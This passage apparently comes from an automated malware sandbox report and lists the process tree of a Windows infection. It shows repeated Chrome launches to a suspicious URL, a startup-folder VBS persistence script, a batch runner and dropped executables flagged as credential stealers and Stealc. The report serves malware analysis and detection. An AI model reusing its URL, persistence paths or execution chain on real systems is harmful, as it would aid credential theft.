MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	01:33:22
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2004,i,13216114064629241855,13841717341427345233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	01:33:23
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	01:33:23
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,10389912691377095377,17096823969531010843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	01:33:23
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	01:33:23
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	01:33:23
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	01:33:24
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1888,i,4051071628513783081,16709262364601523388,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	01:33:24
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1964,i,15873263108661751163,18258898578722931507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	01:33:25
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,6147241270899392023,4453104157303319847,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	01:33:25
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	01:33:25
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	01:33:25
Start date:	07/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs"
Imagebase:	0x7ff73aea0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	01:33:25
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	01:33:25
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1952,i,7341651988098688960,14787193282515593003,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	01:33:26
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe"
Imagebase:	0xaa0000
File size:	3'249'664 bytes
MD5 hash:	DABD794D5925E01CE2525D17795B56E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000038.00000003.2841223672.0000000000F8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000038.00000002.3043805195.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	01:33:26
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2000,i,4938578974072308078,5824721121082526347,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	01:33:27
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1964,i,17019434423062336247,7506196191360105004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	59
Start time:	01:33:27
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Roaming\TypeId.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\TypeId.exe"
Imagebase:	0xdb0000
File size:	1'366'016 bytes
MD5 hash:	CD97D09A95E215EFEE7A40605D6F734C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	01:33:27
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	01:33:28
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1980,i,4588146245341811016,13786467013321908988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	62
Start time:	01:33:28
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	63
Start time:	01:33:28
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	64
Start time:	01:33:28
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1032 --field-trial-handle=1972,i,17637373075668188386,10376262394289011974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	65
Start time:	01:33:29
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	66
Start time:	01:33:29
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1472,i,3006803207684737282,13482510552465898190,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	67
Start time:	01:33:30
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,7370493582738384417,3969430867986938643,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	68
Start time:	01:33:30
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	69
Start time:	01:33:31
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	70
Start time:	01:33:31
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1952,i,8612513622396932950,13356658119274073296,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	71
Start time:	01:33:31
Start date:	07/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	72
Start time:	01:33:32
Start date:	07/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xac0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	01:33:32
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	74
Start time:	01:33:33
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2004,i,12612036452984945250,3418118297406578597,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	75
Start time:	01:33:33
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe"
Imagebase:	0xc90000
File size:	2'097'152 bytes
MD5 hash:	3079517B64FB39F7AE3B94F9BA77F37F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000004B.00000002.2734723718.0000000000C91000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000004B.00000003.2641943936.0000000005120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	01:33:33
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	77
Start time:	01:33:33
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	78
Start time:	01:33:34
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1988,i,16593288603214495399,11730275540552871039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	79
Start time:	01:33:35
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1984,i,14226800829201652385,10276475017906767513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	80
Start time:	01:33:35
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	81
Start time:	01:33:35
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	82
Start time:	01:33:35
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,10262160878012687441,15301380062293127654,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	83
Start time:	01:33:35
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	84
Start time:	01:33:36
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	85
Start time:	01:33:36
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1968,i,3968838028028287844,15257303702526662038,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
